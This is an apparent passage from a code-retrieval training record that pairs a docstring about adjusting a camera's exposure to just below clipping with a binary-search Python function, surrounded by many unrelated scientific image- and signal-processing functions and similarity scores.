if len(traj)>=cutoff:\n # traj=[nan]\n break\n \n trajs.append(array(traj))\n\n return trajs", "def amp_by_time(sig, fs, f_range, hilbert_increase_n=False, remove_edges=True, **filter_kwargs):\n\n sig_filt, kernel = filter_signal(sig, fs, infer_passtype(f_range), f_range=f_range,\n remove_edges=False, return_filter=True, **filter_kwargs)\n\n amp = np.abs(robust_hilbert(sig_filt, increase_n=hilbert_increase_n))\n\n if remove_edges:\n amp = remove_filter_edges(amp, len(kernel))\n\n return amp", "def extract_distribution(ptree):\n w_apx = np.zeros(ptree.shape)\n FlattenPtreeRecur(ptree, w_apx, 1, 1)\n return w_apx", "def processImage(imgs):\r\n imgs = imgs.astype(np.float32)\r\n for i, img in enumerate(imgs):\r\n m = img.mean()\r\n s = img.std()\r\n imgs[i] = (img - m) / s\r\n return imgs", "def learnGauss(metricArray): \n fit = gaussReg() \n n= 100 #You should probably change this...\n overlap = 0.3 \n imageSize = [100,400]\n densMap(fit, metricArray, n, overlap, imageSize )\n overlayMap('SmallTile.jpg', 'ContourPlot.jpg') \n # Final map is saved as OverlayMap.jpg", "def calculate_meanpT_fluc(dN_array, pT_array, pT_min=0.0, pT_max=3.0):\n npT_interp = 50\n pT_inte_array = linspace(pT_min, pT_max, npT_interp)\n\n nev, npT = dN_array.shape\n mean_pT_array = zeros(nev)\n for iev in range(nev):\n dN_interp = exp(interp(pT_inte_array, pT_array[iev, :],\n log(dN_array[iev, :] + 1e-30)))\n mean_pT_array[iev] = (sum(pT_inte_array**2.*dN_interp)\n /sum(pT_inte_array*dN_interp))\n\n # compute the error using jack-knife\n rn_array = zeros(nev)\n for iev in range(nev):\n array_idx = [True]*nev\n array_idx[iev] = False\n array_idx = array(array_idx)\n rn_ev = (std(mean_pT_array[array_idx])\n /(mean(mean_pT_array[array_idx]) + 1e-15))\n rn_array[iev] = rn_ev\n rn_mean = mean(rn_array, axis=0)\n rn_err = sqrt((nev - 1.)/nev*sum((rn_array - rn_mean)**2.))\n return([rn_mean, rn_err])", "def _find_peaks_heuristic(phnorm):\n median_scale = np.median(phnorm)\n\n # First make histogram with bins = 0.2% of median PH\n hist, bins = np.histogram(phnorm, 1000, [0, 2*median_scale])\n binctr = bins[1:] - 0.5 * (bins[1] - bins[0])\n\n # Scipy continuous wavelet transform\n pk1 = np.array(sp.signal.find_peaks_cwt(hist, np.array([2, 4, 8, 12])))\n\n # A peak must contain 0.5% of the data or 500 events, whichever is more,\n # but the requirement is not more than 5% of data (for meager data sets)\n Ntotal = len(phnorm)\n MinCountsInPeak = min(max(500, Ntotal//200), Ntotal//20)\n pk2 = pk1[hist[pk1] > MinCountsInPeak]\n\n # Now take peaks from highest to lowest, provided they are at least 40 bins from any neighbor\n ordering = hist[pk2].argsort()\n pk2 = pk2[ordering]\n peaks = [pk2[0]]\n\n for pk in pk2[1:]:\n if (np.abs(peaks-pk) > 10).all():\n peaks.append(pk)\n peaks.sort()\n return np.array(binctr[peaks])", "def get_mean_image_population(caps_directory, tsv, template_image):\n import pandas as pd\n import os\n import nibabel as nib\n import numpy as np\n\n if not os.path.exists(os.path.join(caps_directory, 'group')):\n os.makedirs(os.path.join(caps_directory, 'group'))\n\n df = pd.read_csv(tsv, sep='\\t')\n if ('session_id' != list(df.columns.values)[1]) and (\n 'participant_id' != list(df.columns.values)[0]):\n raise Exception('the data file is not in the correct format.')\n participant_id = list(df['participant_id'])\n session_id = list(df['session_id'])\n\n # get the template image info:\n template_image_data = nib.load(template_image)\n template_image_array = template_image_data.get_data()\n header = template_image_data.header\n affine = template_image_data.affine\n\n final_array = np.empty((template_image_array.shape[0], template_image_array.shape[1], template_image_array.shape[2], len(participant_id)))\n\n for i in range(len(participant_id)):\n image = os.path.join(caps_directory, 'subjects', participant_id[i], session_id[i], 't1', 'preprocessing_dl', participant_id[i] + '_' + session_id[i] + '_space-MNI_res-1x1x1.nii.gz')\n image_data = nib.load(image)\n image_array = image_data.get_data()\n final_array[..., i] = image_array\n\n # take the mean of image\n final_mean_array = np.mean(final_array, axis=3)\n\n # save the mean image as nifti\n mean_image = nib.Nifti1Image(final_mean_array, affine, header)\n nib.save(mean_image, os.path.join(caps_directory, 'group', 'mean_population.nii.gz'))", "def make_photon_arrays(path, numevents):\n xcoords = []\n zcoords = []\n \n nsipmarrays = []\n nabsarrays = []\n \n for filename in os.listdir(path):\n\n photondata = np.loadtxt(path+'/'+filename,delimiter=',',usecols=[1,4])\n\n coords = filename[0:8]\n\n arraylen = len(photondata.flatten('F'))\n \n nsipmphotons = photondata.flatten('F')[numevents:arraylen]\n #print(len(nsipmphotons))\n nabsphotons = photondata.flatten('F')[0:numevents] \n \n nsipmarrays.append(nsipmphotons)\n nabsarrays.append(nabsphotons)\n \n x = re.findall('(-[0-9]+)x',coords) \n \n if bool(x) == False:\n x = re.findall('([0-9]+)x', coords)\n \n z = re.findall('(-[0-9]+)z',coords) \n\n if bool(z) == False:\n z = re.findall('([0-9]+)z',coords)\n\n xcoords.append(x[0])\n zcoords.append(z[0])\n \n xcoords = np.array(xcoords).astype(np.float)\n zcoords = np.array(zcoords).astype(np.float)\n \n return xcoords, zcoords, nsipmarrays, nabsarrays", "def gaussianPyr(img: np.ndarray, levels: int = 4) -> List[np.ndarray]:\r\n img = cropPic(img, levels)\r\n pyrLst = [img]\r\n gaussian = gaussianKer(5)\r\n\r\n for i in range(1, levels):\r\n I_temp = cv2.filter2D(pyrLst[i - 1], -1, gaussian, cv2.BORDER_REPLICATE)\r\n I_temp = I_temp[::2, ::2]\r\n pyrLst.append(I_temp)\r\n return pyrLst", "def locate_traps(graph):\n traps = []\n for node in graph:\n if len(graph[node]) < 2:\n traps.append(node)\n continue\n else:\n neighbours = graph[node]\n\n # copy graph and delete the node\n temp_graph = copy.deepcopy(graph)\n for neighbour in neighbours:\n temp_graph[neighbour].remove(node)\n temp_graph.pop(node)\n\n # heuristic: if you can BFS from a node's neighbour to all other neighbours in < 10 steps (after removing that node), then graph is still connected => not a trappable node\n BFS_q = deque()\n visited = [[False] * 12 for _ in range(10)]\n visited[neighbours[0][1]][neighbours[0][0]] = True\n BFS_q.append(neighbours[0])\n counter = 0\n while len(BFS_q) > 0 and counter < 10:\n u = BFS_q.popleft()\n for BFS_neighbour in temp_graph[u]:\n if not visited[BFS_neighbour[1]][BFS_neighbour[0]]:\n visited[BFS_neighbour[1]][BFS_neighbour[0]] = True\n BFS_q.append(BFS_neighbour)\n counter += 1\n for neighbour in neighbours:\n if visited[neighbour[1]][neighbour[0]] is False:\n traps.append(node)\n continue\n return (traps)", "def Read_AGSS(fln, oversample=None, sigma=None, tophat=None, thin=None, wave_cut=None, convert=None, linlog=False):\n ## Opening the file table\n hdu = pyfits.open(fln)\n\n ## Extracting the wavelength from the header\n hdr = hdu[0].header\n wav = hdr['CRVAL1'] + np.arange(hdr['NAXIS1'], dtype=float) * hdr['CDELT1']\n\n ## Extracting the data. grid.shape = n_mu, n_wavelength\n grid = hdu[0].data\n\n ## Trim the unwanted wavelength range\n if wave_cut is not None:\n inds = (wav >= wave_cut[0]) * (wav <= wave_cut[1])\n grid = grid[:,inds]\n wav = wav[inds]\n\n ## Oversample the spectrum if requested\n if oversample is not None and oversample != 1:\n #grid = scipy.ndimage.zoom(grid, oversample, order=1, mode='reflect')\n #wav = np.linspace(wav[0], wav[-1], wav.size*oversample)\n interp = scipy.interpolate.UnivariateSpline(wav, grid, k=1, s=0)\n wav = np.linspace(wav[0], wav[-1], wav.size*oversample+1)\n grid = interp(wav)\n\n ## Smooth the spectrum if requested\n logger.log(6, \"Original: sigma {}, tophat {}\".format(sigma,tophat))\n if sigma is not None or tophat is not None:\n bin = wav[1]-wav[0]\n ## We have to convert values to bin units\n if sigma is None:\n sigma = 0.\n else:\n sigma = sigma/bin\n if tophat is None:\n tophat = 1\n else:\n tophat = int(tophat/bin + 0.5)\n tophat = 1 if tophat < 1 else tophat\n logger.log(6, \"Bin converted: bin {}, sigma {}, tophat {}\".format(bin,sigma,tophat))\n grid = Utils.Series.Convolve_gaussian_tophat(grid, sigma=sigma, top=tophat)\n\n ## Thin the spectrum if requested\n if thin is not None:\n grid = grid[::thin]\n wav = wav[::thin]\n\n ## Convert to logarithmic (velocity) scale so that Doppler boosting is linear\n if linlog:\n new_wav, z = Utils.Series.Resample_linlog(wav)\n ws, inds = Utils.Series.Getaxispos_vector(wav, new_wav)\n wav = new_wav\n grid = grid.take(inds, axis=-1)*(1-ws) + grid.take(inds+1, axis=-1)*ws\n else:\n z = None\n if convert is not None:\n print( \"Saving the data into \"+fln+convert )\n np.savetxt(fln+convert,np.vstack((wav,np.log10(grid))).T)\n return grid, wav, z", "def adaptiveGaussianThreshold(img):\n\tgray = grayscale(img)\n\tgray = cv2.medianBlur(gray, 5)\n\tthresh = cv2.adaptiveThreshold(gray, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)\n\treturn thresh", "def calc_flux_array(self):\n \n # First determine the associated spectrum\n self.compute_template_spectrum()\n\n # Calculate baseline counts to normalise fluxes we scan over\n # Go from 10**(bin_min)*mean up to 10**(bin_max)*mean in nbins steps\n b = self.setup_b_instance(0,add_ps_mask=True)\n mean = np.sum(b.CTB_masked_compressed[0])/len(b.CTB_masked_compressed[0])\n A_array = mean*10**np.linspace(self.bin_min,self.bin_max,self.nbins)\n\n # Array to get LLs when no profile likelihood run\n norun = np.array([1.0, 1.0, 1.0, 1.0])\n\n # Now setup and compute the arrays\n LL_array = np.array([]) \n A_array_short = np.array([])\n spect_array = np.array([])\n\n for i in range(len(A_array)):\n print \"on i =\",i\n # Calculate LL\n if i == 0:\n b1 = self.setup_b_instance(A_array[i],add_ps_mask=True)\n else:\n for key in b1.fixed_template_dict_nested.keys():\n b1.fixed_template_dict_nested[key] = b1.fixed_template_dict_nested[key]*A_array[i]/A_array[i-1]\n ll_val = b1.ll(norun,4,4)\n # Make triangle\n\n # Append to arrays\n LL_array = np.append(LL_array,ll_val)\n A_array_short = np.append(A_array_short,A_array[i])\n spect_array = self.spectrum*np.array(A_array_short)\n\n # Save output\n np.save(work_dir+'ScanOutput/'+self.tag+'/En_array-'+str(self.flux_array_ebin)+'.npy',self.En_center)\n np.save(work_dir+'ScanOutput/'+self.tag+'/LL_array-'+str(self.flux_array_ebin)+'.npy',LL_array)\n np.save(work_dir+'ScanOutput/'+self.tag+'/Flux_array-'+str(self.flux_array_ebin)+'.npy',spect_array)", "def extract_features(img, thr=0.005):\n if img.ndims == 3:\n img = cv2.cvtColor(im1, cv2.COLOR_BGR2GRAY)\n\n detector = cv2.AKAZE_create()\n (kpts, descs) = detector.detectAndCompute(img, None)\n return kpts, descs", "def fmgf(array, sigma):\n x, y = np.arange(len(array)), array.copy()\n yg = ndimage.filters.gaussian_filter(y, sigma)\n y -= yg\n\n # digitizing\n m = 101\n dy = 6.0 * mad(y) / m\n ybin = np.arange(np.min(y) - 5 * dy, np.max(y) + 5 * dy + dy, dy)\n z = np.zeros([len(ybin), len(x)])\n z[np.digitize(y, ybin), x] = 1.0\n\n # filtering\n g = partial(ndimage.filters.gaussian_filter, sigma=(0, sigma))\n c = partial(ndimage.filters.convolve1d, weights=np.ones(m), axis=0)\n zf = c(c(c(g(z))))\n\n # estimates\n ym1, y0, yp1 = [ybin[np.argmax(zf, 0) + i] for i in (-1, 0, 1)]\n zm1, z0, zp1 = [zf[np.argmax(zf, 0) + i, x] for i in (-1, 0, 1)]\n t = (zm1 - z0) / (zm1 - 2 * z0 + zp1)\n\n filtered = yg + ((1 - t) ** 2) * ym1 + (2 * t * (1 - t)) * y0 + (t**2) * yp1\n return filtered", "def _compute_supersky(self, starMasks):\n # TODO: break this into more managably bite sized bits if necessary.\n\n # Construct a median normalized data stack\n dataStack = np.zeros(self.shape, dtype=np.float32)\n\n # Loop through each image, normalize and place in data stack\n for imgNum, img in enumerate(self.imageList):\n # Copy the data for this image\n thisData = img.data\n\n # Mask this image with its starMask\n starInds = np.where(starMasks[imgNum, :, :])\n thisData[starInds] = np.NaN\n\n # Compute the median of this image\n thisMedian = np.nanmedian(thisData)\n\n # Median normalize this image\n thisData /= thisMedian\n\n # Place the normalized image in its place\n dataStack[imgNum, :, :] = thisData\n\n # Compute the median image (ignore warnings because we'll fix those)\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n medianArray = np.nanmedian(dataStack, axis=0)\n\n # Comptue uncertainty as standard deviation/sqrt(numOfUnmaskedPixels)\n stdArray = np.nanstd(dataStack, axis=0)\n numPix = np.nansum(dataStack, axis=0)\n uncertArray = stdArray/np.sqrt(numPix - 1)\n\n # Renormalize by this output median\n thisMedian = np.nanmedian(medianArray)\n medianArray /= thisMedian\n uncertArray /= np.abs(thisMedian)\n\n # Return to user\n return medianArray, uncertArray", "def find_gaussian(img,sigma=25):\n method = 'cv2.TM_CCOEFF_NORMED'\n size=3*sigma\n template = gaussian(size,sigma)\n template/=template.max()\n template*=255\n template = template.astype(np.uint8)\n \n threshold = 0.9\n w, h = template.shape[::-1]\n \n img2 = img.copy()\n meth = eval(method)\n\n # Apply template Matching\n res = cv2.matchTemplate(img2,template,meth)\n #Filters location map so that only one gaussian is found per contiguous location\n location_map = res >= threshold*np.max(res)\n location_map,nr = ndi.label(location_map)\n list_x = []\n list_y = []\n for label in range(1,nr+1):\n tmp=location_map==label\n if np.count_nonzero(tmp)>1:\n points = np.where(tmp)\n l = len(points[0])\n cx = (np.sum(points[0]) + l/2)/l\n cy = (np.sum(points[1]) + l/2 )/l\n list_x.append(cx)\n list_y.append(cy)\n loc= (np.asarray(list_x),np.asarray(list_y))\n stack_to_remove = np.zeros((size,size,len(loc[0])))\n i=0\n for pt in zip(*loc[::-1]):\n cv2.rectangle(img2, pt, (pt[0] + w, pt[1] + h), 255, 2)\n stack_to_remove[:,:,i] = img[pt[1]:pt[1]+w,pt[0]:pt[0]+h]\n i+=1\n return stack_to_remove,loc", "def ts_method(signal, peaks, template_duration: float = 0.12, fs: int = processing.FS, window: int = 10, **kwargs):\n\n t_dur = round(template_duration * fs)\n if not t_dur % 2 == 0:\n t_dur += 1\n dims = signal.shape\n # if np.max(np.abs(signal[0, :])) < np.max(np.abs(signal[1, :])):\n # r_peaks = find_qrs(signal[1, :], peak_search=peak_search)\n # r_peaks = peak_enhance(signal[1, :], peaks=r_peaks, window=0.2)\n # else:\n # processing.scatter_beautiful(r_peaks * 1000 / fs, title='peaks')\n extracted_signal = np.copy(signal)\n # print(len(r_peaks))\n # Please, rework it...\n for n in range(dims[0]):\n for i in range(0, len(peaks), window):\n\n if i + window > len(peaks):\n r_peaks = peaks[i:]\n else:\n r_peaks = peaks[i:i + window]\n\n template = np.full((len(r_peaks), t_dur), np.nan)\n for num, r_ind in enumerate(r_peaks):\n if r_ind < t_dur // 2:\n template[num, t_dur // 2 - r_ind - 1:] = extracted_signal[n, 0:r_ind + t_dur // 2 + 1]\n elif r_ind + t_dur // 2 + 1 > dims[1]:\n template[num, 0:dims[1] - r_ind + t_dur // 2] = extracted_signal[n, r_ind - t_dur // 2:]\n else:\n template[num] = extracted_signal[n, r_ind - t_dur // 2:r_ind + t_dur // 2]\n template_mean = np.nanmean(template, axis=0) # None for edge cases\n for r_ind in r_peaks:\n if r_ind < t_dur // 2:\n extracted_signal[n, 0:r_ind + t_dur // 2 + 1] -= template_mean[t_dur // 2 - r_ind - 1:]\n # processing.scatter_beautiful(components[n, :], title=' subtracted channel start ' + str(n))\n elif r_ind + t_dur // 2 + 1 > dims[1]:\n extracted_signal[n, r_ind - t_dur // 2:r_ind + t_dur // 2 + 1] -= template_mean[\n 0:dims[1] - r_ind + t_dur // 2]\n # processing.scatter_beautiful(components[n, :], title=' subtracted channel end ' + str(n))\n else:\n extracted_signal[n, r_ind - t_dur // 2:r_ind + t_dur // 2] -= template_mean\n # processing.scatter_beautiful(components[n, :], title=' subtracted channel ' + str(n))\n return extracted_signal", "def extract_statistics(transformed: np.ndarray) -> np.ndarray:\n ecg_features = []\n print(\"Extracting statistics from transformed signals...\")\n\n for x in tqdm(transformed):\n median_temp = np.median(x[:, :-1], axis=0)\n mad_temp = median_abs_deviation(x[:, :-1], axis=0)\n\n median_hr = np.median(x[:, -1], keepdims=True)\n mad_hr = median_abs_deviation(x[:, -1]).reshape([-1])\n\n features = np.concatenate([median_temp, mad_temp, median_hr, mad_hr])\n ecg_features.append(features)\n\n return np.array(ecg_features)", "def gaussianPyr(img: np.ndarray, levels: int = 4) -> List[np.ndarray]:\r\n gauss_pyramid = [img]\r\n gArr = cv2.getGaussianKernel(5, -1)\r\n gKernel = gArr @ gArr.transpose()\r\n for i in range(1, levels):\r\n It = cv2.filter2D(gauss_pyramid[i-1], -1, gKernel)\r\n It = It[::2, ::2]\r\n gauss_pyramid.append(It)\r\n\r\n return gauss_pyramid", "def extract_anisotropy_features (Parameters, image, mask=None):\n \n data_inputs = {}\n \n Ka, Kb, Kc = Parameters.kA, Parameters.kB, Parameters.kC\n \n \n h, w, channels = image.shape\n \n if channels == 2:\n channel_types = [\"Para\", \"Perp\"]\n elif channels == 3:\n channel_types = [\"Open\", \"Para\", \"Perp\"]\n \n \n for index, channel in enumerate(channel_types):\n \n data_inputs[channel] = np.sum(image[:,:, index])/np.count_nonzero(image[:,:, index])\n\n\n #Additional parameters\n para_value = data_inputs['Para']\n perp_value = data_inputs['Perp']\n data_inputs['AniAvg'] = (para_value - perp_value)/(para_value + 2*perp_value)\n \n #With corrections\n data_inputs['Ix'] = Ix = ((Ka+Kb)*perp_value - (Ka+Kc)*para_value)/(Ka*Kb + Kb*Kb - Ka*Kc - Kc*Kc)\n data_inputs['Iy'] = Iy = (Kb*para_value - Kc*perp_value)/(Ka*Kb + Kb*Kb - Ka*Kc - Kc*Kc)\n data_inputs['AniAvg'] = (Ix - Iy)/(Ix + 2*Iy)\n \n\n \n return (data_inputs)", "def search_peaks(self, image):\n table = Table()\n if not isinstance(image, np.ndarray):\n return table\n\n search_image = image\n if self.smooth:\n with catch_warnings():\n simplefilter('ignore')\n search_image = convolve_fft(\n search_image, Gaussian2DKernel(self.sigma),\n normalize_kernel=True,\n preserve_nan=True)\n\n # always replace NaNs with median level: DAOStarFinder\n # won't find sources with NaN on top\n nval = np.isnan(search_image)\n search_image[nval] = np.median(search_image[~nval])\n\n # always take absolute value for fitting purposes\n search_image = abs(search_image)\n\n threshold = np.array([np.nanmin(search_image),\n np.nanmax(search_image)])\n threshold *= [0.9, 1.1]\n if threshold[0] < 0: # pragma: no cover\n threshold[0] = 0.\n\n self.iteration = 0\n while self.iteration < self.maxiter:\n self.iteration += 1\n with catch_warnings():\n simplefilter('ignore', AstropyWarning)\n self.threshold = threshold.mean()\n finder = DAOStarFinder(\n self.threshold, self.fwhm,\n sharplo=self.sharplo, sharphi=self.sharphi,\n roundlo=self.roundlo, roundhi=self.roundhi)\n table = finder.find_stars(search_image)\n self.chopnod_sort(table)\n\n if self.refine and self.positive:\n self.refine_table(image, table)\n if not table:\n nfound = 0\n else:\n nfound = len(table)\n\n if abs(threshold[0] - threshold[1]) < self.eps and (\n nfound != self.npeaks):\n self.print('Min/max interval is null, breaking loop at '\n 'iteration #%s' % self.iteration)\n return table\n elif nfound < self.npeaks:\n threshold[1] = self.threshold\n elif nfound > self.npeaks:\n threshold[0] = self.threshold\n else:\n return table\n else:\n return table", "def build_zigzag_times(rips,n,numbins):\n times = [[] for x in range(0,rips.__len__())]\n i=0\n for x in rips:\n dim = x.dimension()\n t = [];\n for k in range(0,dim+1):\n t.append(x[k])\n xmin = math.floor(min(t)/n)\n xmax = math.floor(max(t)/n)\n if xmax == 0:\n bd = [0,1]\n elif xmin == numbins-1:\n bd = [2*xmin-1,2*xmin]\n elif xmax == xmin:\n bd = [2*xmin-1,2*xmin+1]\n elif xmax > xmin:\n bd = [2*xmax-1,2*xmax-1]\n else:\n print(\"Something has gone horribly wrong!\")\n times[i] = bd\n i = i+1\n return times", "def _screen_by_snr(self,\n array: np.ndarray,\n is_smoothed: bool,\n keep_negative: bool) -> np.ndarray:\n n_gates, _, saturation_noise, noise_min = self.noise_params\n noise_min = noise_min[0] if is_smoothed is True else noise_min[1]\n noise = _estimate_noise_from_top_gates(array, n_gates, noise_min)\n array = self._reset_low_values_above_saturation(array, saturation_noise)\n array = self._remove_noise(array, noise, keep_negative)\n return array", "def create_gaussian_array(self):\n\n # Fill array of size l x w with Gaussian Noise.\n terrain_length = int(ceil(self.length/self.resolution))\n terrain_width = int(ceil(self.width/self.resolution))\n gaussian_array = np.random.normal(self.mu, self.sigma, (terrain_length,terrain_width))\n\n # Filter the array to smoothen the variation of the noise\n gaussian_array = gaussian_filter(gaussian_array, self.sigma_filter)\n\n return gaussian_array" ]
[ "0.587632", "0.52485836", "0.5228704", "0.5138485", "0.5076651", "0.50504184", "0.5020896", "0.49921283", "0.49873865", "0.4987357", "0.49527085", "0.48427442", "0.48109403", "0.4805407", "0.47939897", "0.47633266", "0.47571003", "0.47376722", "0.47331765", "0.47273827", "0.470503", "0.46984622", "0.46977895", "0.46950454", "0.46633723", "0.4635799", "0.46310976", "0.4594745", "0.4588485", "0.45748767", "0.45734733", "0.4560085", "0.4550026", "0.45269135", "0.45187512", "0.4513564", "0.4503864", "0.45015773", "0.4487218", "0.44871503", "0.44714704", "0.4454072", "0.44430974", "0.44375116", "0.4419168", "0.44191366", "0.44144252", "0.44118664", "0.44089362", "0.44034746", "0.43921626", "0.43899295", "0.43772966", "0.43628797", "0.4351655", "0.43502825", "0.43458703", "0.43381307", "0.4332353", "0.43220693", "0.4319666", "0.4318764", "0.43162322", "0.43155703", "0.43148923", "0.4314468", "0.43024802", "0.43016464", "0.4301208", "0.42991918", "0.42934328", "0.42918316", "0.42837703", "0.42795086", "0.4278043", "0.42770097", "0.42757356", "0.4271442", "0.42655483", "0.42619538", "0.4261159", "0.4258165", "0.4254408", "0.42481622", "0.42460847", "0.42455357", "0.42452404", "0.42407414", "0.424074", "0.42403284", "0.4237082", "0.42351753", "0.42349866", "0.42326018", "0.42323828", "0.42321843", "0.42305118", "0.422921", "0.4213736", "0.42114887" ]
0.5898754
0
Given the opened camera object and the Slider object connected to the camera's exposure, adjusts the exposure to just below clipping. Binary Search
def fix_exposure(cam, slider, verbose=False): margin = 10 exp_t = MAX_EXP / 2 cam._set_exposure(exp_t * u.milliseconds) time.sleep(0.5) print("Fetching Frame") im = cam.latest_frame() x_len = len(im) right, left = MAX_EXP, 0 inc = right / 10 for _ in range(10): ## Determine if Clipping or Low-Exposure ## gap = 255 for i in range(x_len): if i < margin or x_len - i < margin: continue else: gap = min(255 - max(im[i]), gap) ## Make Appropriate Adjustment ## if gap == 0: if verbose: print("Clipping at: ", exp_t) right = exp_t elif gap > 50: if verbose: print("Closing gap: ", gap, " w/ exposure: ", exp_t) left = exp_t else: if verbose: print("Final Exposure: ", exp_t) return if inc < 0.01: exp_t -= inc if gap == 0 else -inc else: exp_t = (right + left) / 2 inc = (right - left) / 10 slider.set_val(exp_t) time.sleep(1) im = cam.latest_frame()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_exposure(self, expo):\n if expo == 0:\n self.exposure = 0\n elif expo == 1:\n self.exposure = min(9, self.exposure+1)\n elif expo == -1:\n self.exposure = max(-9, self.exposure-1)\n self.drone.set_exposure(self.exposure)\n log.info(f\"EXPOSURE {self.exposure}\")", "def exposure(self):\n\n # define a range of declination to evaluate the\n # exposure at\n self.declination = np.linspace(-np.pi/2, np.pi/2, self.num_points)\n\n m = np.asarray([m_dec(d, self.params) for d in self.declination])\n \n # normalise to a maximum at 1\n self.exposure_factor = (m / m_dec(-np.pi/2, self.params))\n\n # find the point at which the exposure factor is 0\n self.limiting_dec = Angle((self.declination[m == 0])[0], 'rad')", "def roi_ko(self):\n self.pressure_img.mask = self.pressure_img.previous_roi", "def process_image(self, image):\n #Resize and blur the image, put into HSV color scale, and create an image mask \n img_small = cv2.resize(image, None, fx=self.subsample_ratio, fy=self.subsample_ratio, interpolation=cv2.INTER_LINEAR) \n img_blur = cv2.GaussianBlur(img_small, (5,5), 0)\n img_hsv = cv2.cvtColor(img_blur, cv2.COLOR_BGR2HSV)\n mask_l = cv2.inRange(img_hsv, self.hsv_lower_lower, self.hsv_lower_upper)\n mask_u = cv2.inRange(img_hsv, self.hsv_upper_lower, self.hsv_upper_upper)\n mask = cv2.bitwise_or(mask_l, mask_u)\n\n #Publish the mask\n mask_bgr8 = cv2.cvtColor(mask,cv2.COLOR_GRAY2BGR)\n bridge = CvBridge()\n cv_mask = bridge.cv2_to_imgmsg(mask_bgr8, encoding='bgr8')\n self.pub.publish(cv_mask)\n\n #find the largest contour of the mask or return 0 if target is not there\n img, cnts, cnt_hier = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n if len(cnts) == 0:\n return (0, (0,0))\n c = max(cnts, key=cv2.contourArea)\n\n #find the height of the target object and its center using minAreaRect\n rect = cv2.minAreaRect(c)\n height_px = rect[1][1] / self.subsample_ratio\n target_x = rect[0][0] / self.subsample_ratio\n target_y = rect[0][1] / self.subsample_ratio\n offset_px = (target_x - self.image_center[0]) , -1.0*(target_y - self.image_center[1])\n\n #NOTE!! When using a ball shaped object, use minEnclosingCircle and the circle diameter\n #enc_circle = 2 * cv2.minEnclosingCircle(c)[1]\n #height_px = 2 * enc_circle[1]\n #offset_px = (enc_circle[0][0] - self.image_center[0]) , -1*(enc_circle[0][1] - self.image_center[1])\n\n return height_px, offset_px", "def enable_lower_center_roi_auto_exposure(image_width, image_height, hid_handle, win_size=4):\n outputLow = 0\n outputHigh = 255\n\n # Convert RoI center position to 0-255 value\n inputXLow = 0\n inputXHigh = image_width - 1\n inputXCord = int(image_width / 2)\n outputXCord = int(((inputXCord - inputXLow) / (inputXHigh - inputXLow)) * (outputHigh - outputLow) + outputLow)\n\n inputYLow = 0\n inputYHigh = image_height - 1\n inputYCord = int(image_height * 3 / 4)\n outputYCord = int(((inputYCord - inputYLow) / (inputYHigh - inputYLow)) * (outputHigh - outputLow) + outputLow)\n\n input_buffer = bytearray([0] * BUFFER_LENGTH)\n input_buffer[1] = CAMERA_CONTROL_CU20\n input_buffer[2] = SET_AE_ROI_MODE_CU20\n input_buffer[3] = AutoExpManual\n input_buffer[4] = outputXCord\n input_buffer[5] = outputYCord\n input_buffer[6] = win_size\n\n hid_write(hid_handle, input_buffer)\n output_buffer = hid_read(hid_handle)\n\n if output_buffer[6] == 0x00:\n print(\"\\nEnabling AutoExposure(RoI based) is failed\\n\")\n return False\n elif (\n output_buffer[0] == CAMERA_CONTROL_CU20\n and output_buffer[1] == SET_AE_ROI_MODE_CU20\n and output_buffer[6] == SUCCESS\n ):\n print(\"\\nAutoExposure(RoI based) is enabled\\n\")\n return True", "def enable_roi_auto_exposure(xcord, ycord, image_width, image_height, hid_handle, win_size=4):\n outputLow = 0\n outputHigh = 255\n\n # Convert RoI center position to 0-255 value\n inputXLow = 0\n inputXHigh = image_width - 1\n inputXCord = xcord\n outputXCord = int(((inputXCord - inputXLow) / (inputXHigh - inputXLow)) * (outputHigh - outputLow) + outputLow)\n\n inputYLow = 0\n inputYHigh = image_height - 1\n inputYCord = ycord\n outputYCord = int(((inputYCord - inputYLow) / (inputYHigh - inputYLow)) * (outputHigh - outputLow) + outputLow)\n\n input_buffer = bytearray([0] * BUFFER_LENGTH)\n input_buffer[1] = CAMERA_CONTROL_CU20\n input_buffer[2] = SET_AE_ROI_MODE_CU20\n input_buffer[3] = AutoExpManual\n input_buffer[4] = outputXCord\n input_buffer[5] = outputYCord\n input_buffer[6] = win_size\n\n hid_write(hid_handle, input_buffer)\n output_buffer = hid_read(hid_handle)\n\n if output_buffer[6] == 0x00:\n print(\"\\nEnabling AutoExposure(RoI based) is failed\\n\")\n return False\n elif (\n output_buffer[0] == CAMERA_CONTROL_CU20\n and output_buffer[1] == SET_AE_ROI_MODE_CU20\n and output_buffer[6] == SUCCESS\n ):\n print(\"\\nAutoExposure(RoI based) is enabled\\n\")\n return True", "def reset_camera_clipping_range(self):\n self.ResetCameraClippingRange()", "def exposureCallback(self, config):\n rospy.loginfo('Set exposure: {}'.format(config['exposure']))", "def autoExpose(camera,\r\n target_level=245,\r\n adjust_shutter=True,\r\n adjust_gain=True):\r\n\r\n if target_level <= 0 or target_level >= 255:\r\n raise ValueError(\"Target level must be value between in the range\"\r\n \"]0,255[ !\")\r\n\r\n # There must be something to adjust\r\n if ~adjust_shutter and ~adjust_gain:\r\n raise ValueError(\"At one of the variables must be adjustable!\")\r\n\r\n while True:\r\n # Grab frame\r\n image = camera.retrieveBuffer()\r\n image = image.convert(PyCapture2.PIXEL_FORMAT.RAW8)\r\n data = image.getData()\r\n\r\n # Grab current camera properties\r\n shutter = camera.getProperty(PyCapture2.PROPERTY_TYPE.SHUTTER).absValue\r\n gain = camera.getProperty(PyCapture2.PROPERTY_TYPE.GAIN).absValue\r\n\r\n # Exposition adjustment\r\n max_val = np.max(data)\r\n print(\"Shutter = {0:.2f}[ms], Gain = {1:.1f}[db],\"\r\n \"Max pixel value = {2:d} \".format(shutter, gain, max_val),\r\n end='\\r')\r\n\r\n if max_val == max:\r\n if gain == 0 or ~adjust_shutter:\r\n if shutter > 0.1:\r\n shutter = max(0.1, shutter * (1 + _dShutter))\r\n else:\r\n gain = max(0, gain - _dGain)\r\n\r\n elif max_val < min:\r\n if shutter < 8:\r\n shutter = min(8.1, shutter / (1 + _dShutter))\r\n else:\r\n gain += _dGain\r\n else:\r\n break\r\n\r\n # Update camera parameters\r\n if autoExpose:\r\n 